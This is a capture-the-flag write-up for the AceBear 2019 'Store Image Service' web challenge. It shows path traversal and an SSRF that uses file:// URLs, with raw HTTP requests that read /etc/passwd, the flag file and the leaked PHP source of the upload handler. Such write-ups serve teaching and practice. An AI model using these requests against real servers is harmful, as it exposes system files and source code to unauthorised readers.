CTFtime.org / AceBear Security Contest 2019 / Store Image Service / Writeup

# ▼▼▼Store Image Service(point:100、46/142=32.4％)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

```
http://storeimage.whitehat.vn/s3rv1c3/

author: haxor

Hint: Read flag at Fl4g.php
```

## 【Understanding functions】

```
http://storeimage.whitehat.vn/s3rv1c3/?page=home　→ TOP screen

http://storeimage.whitehat.vn/s3rv1c3/?page=contact　→ contanct function to admin

http://storeimage.whitehat.vn/s3rv1c3/?page=upload　→ Image upload function
```

---

## 【Identify the location of the flag】

```
GET /s3rv1c3/Fl4g.php HTTP/1.1
Host: storeimage.whitehat.vn
```

↓

```
HTTP/1.1 200 OK
Date: Mon, 08 Apr 2019 10:03:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
```

↓

I knew the location of the flag. Nothing was displayed.

---

## 【Vulnerability Identification】

```
GET /s3rv1c3/index.php?page=home
GET /s3rv1c3/index.php?page=../s3rv1c3/home
```

↓

Both can get the contents of home

**Path Traversal** vulnerability exists

---

```
POST /s3rv1c3/?page=upload HTTP/1.1
Host: storeimage.whitehat.vn
Content-Type: application/x-www-form-urlencoded

url=file:///etc/passwd
```

↓

```

<html lang="en"><head><title>Image Service</title></head><body>
<link href="bootstrap.min.css" rel="stylesheet">
<link href="clean-blog.min.css" rel="stylesheet">
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
<div class="container-fluid">

Home

Contact

Upload

</div></nav>

<header class="intro-header" style="background-image: url('document.png')">
<div class="container"><div class="page-heading" align="left">
<h1>Image Service</h1><hr class="small"><span>Share Image</span>
</div></div></header>

<div class="container"><div class="row"><div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">

<h2>Upload</h2><h4>Upload your image</h4>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
tomcat:x:999:999::/opt/tomcat:/bin/bash

You do not need to give away any personal information to use Image service. Simply share your document and very anonymous

<form enctype="multipart/form-data" action="" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="500000" />
Attach image: <input name="file" type="file" accept=".jpeg,.jpg,.png,.gif" class="btn btn-primary btn-file" />

<input type="submit" value=" Upload " class="btn btn-default"/>
</form>
<form action="?page=upload" method="POST">
Upload image from url: <input name="url" type="text" />

<input type="submit" value=" Upload " class="btn btn-default"/>
</form>

</div></div><hr></div>

</div></footer>
</body></html>
```

↓

**SSRF** vulnerability exists and `file://` is available

---

## 【Identify the location of the web root folder】

`GET /s3rv1c3/index.php?page=../../../../var/www/html/s3rv1c3/home`

↓

I can get the contents of home

↓

Web root is `/var/www/html/` !!

---

## 【exploit】

```
POST /s3rv1c3/?page=upload HTTP/1.1
Host: storeimage.whitehat.vn
Content-Type: application/x-www-form-urlencoded

url=file:///var/www/html/s3rv1c3/Fl4g.php
```

↓

```
You do not need to give away any personal information to use Image service. Simply share your document and very anonymous

</div></div><hr></div>

</div></footer>
</body></html>
```

↓

`AceBear{TurN_ONNNN_sSrf_tooooooooooo_RCE}`

---

## 【(Reference) Source code】

**index.php**

↓

```
POST /s3rv1c3/?page=upload HTTP/1.1
Host: storeimage.whitehat.vn
Content-Type: application/x-www-form-urlencoded

url=file:///var/www/html/s3rv1c3/index.php
```

↓
```

<h2>Upload</h2><h4>Upload your image</h4>

Home

Contact

Upload

</div></nav>

</div></div><hr></div>

</div></footer>
</body></html>

You do not need to give away any personal information to use Image service. Simply share your document and very anonymous

```

---

**upload.php**

↓

```
POST /s3rv1c3/?page=upload HTTP/1.1
Host: storeimage.whitehat.vn
Content-Type: application/x-www-form-urlencoded

url=file:///var/www/html/s3rv1c3/upload.php
```

↓

```

<h2>Upload</h2><h4>Upload your image</h4>

Not a valid image</h4>');
// Size
if($_FILES['file']['size'] > $max_size)
die('<h4>Not a valid image</h4>');
// Client Headers
#if(!in_array($_FILES['file']['type'], $valid_headers))
#die('<h4>Not a valid image</h4>');
// File type
$finfo = new finfo(FILEINFO_MIME);
$type = $finfo->file($_FILES['file']['tmp_name']);
if(!in_array($type, $valid_types))
die('<h4>Not a valid image</h4>');

// Move Upload
$file=sha1(file_get_contents($_FILES['file']['tmp_name']).time().rand()).'.'.$ext;
$dest = './uploads/'.$file;
if (move_uploaded_file($_FILES['file']['tmp_name'], $dest))
echo '

Your image is uploaded as '.$file.' and queued for processing.
';
	    echo 'Queue and document are empty every 20 minutes.

';
}
/*function safe($url)
{
$tmpurl = strtolower(parse_url($url, PHP_URL_SCHEME));
if($tmpurl == "file")
{
var_dump($tmpurl);
die("

Only allow http

");
}
return $url;
}*/
function getUrlContent($url){
//$url = safe($url);
urldecode($url);
$header = array('Accept-Charset: UTF-8');
$curl = curl_init();
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
curl_setopt ($curl, CURLOPT_URL, $url);
curl_exec ($curl);
curl_close ($curl);
}
if (isset($_POST['url'])&&!empty($_POST['url']))
{
$url=$_POST['url'];
getUrlContent($url);

}
?>

You do not need to give away any personal information to use Image service. Simply share your document and very anonymous

<form enctype="multipart/form-data" action="" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="<?php echo $max_size; ?>" />
Attach image: <input name="file" type="file" accept=".jpeg,.jpg,.png,.gif" class="btn btn-primary btn-file" />

<input type="submit" value=" Upload " class="btn btn-default"/>
</form>
<form action="?page=upload" method="POST">
Upload image from url: <input name="url" type="text" />

<input type="submit" value=" Upload " class="btn btn-default"/>
</form>

You do not need to give away any personal information to use Image service. Simply share your document and very anonymous

```

---

**contact.php**

↓

```
POST /s3rv1c3/?page=upload HTTP/1.1
Host: storeimage.whitehat.vn
Content-Type: application/x-www-form-urlencoded

url=file:///var/www/html/s3rv1c3/contact.php
```

↓

```

<h2>Upload</h2><h4>Upload your image</h4>

<h2>Contact</h2><h4>Contact technical support or make a suggestion</h4>
Thank you for your request, We will respond in 20 minutes.";
}
?>

You do not need to give away any personal information to use Image service. Simply share your document and very anonymous

```

Store Image Service

Comments

Sign in with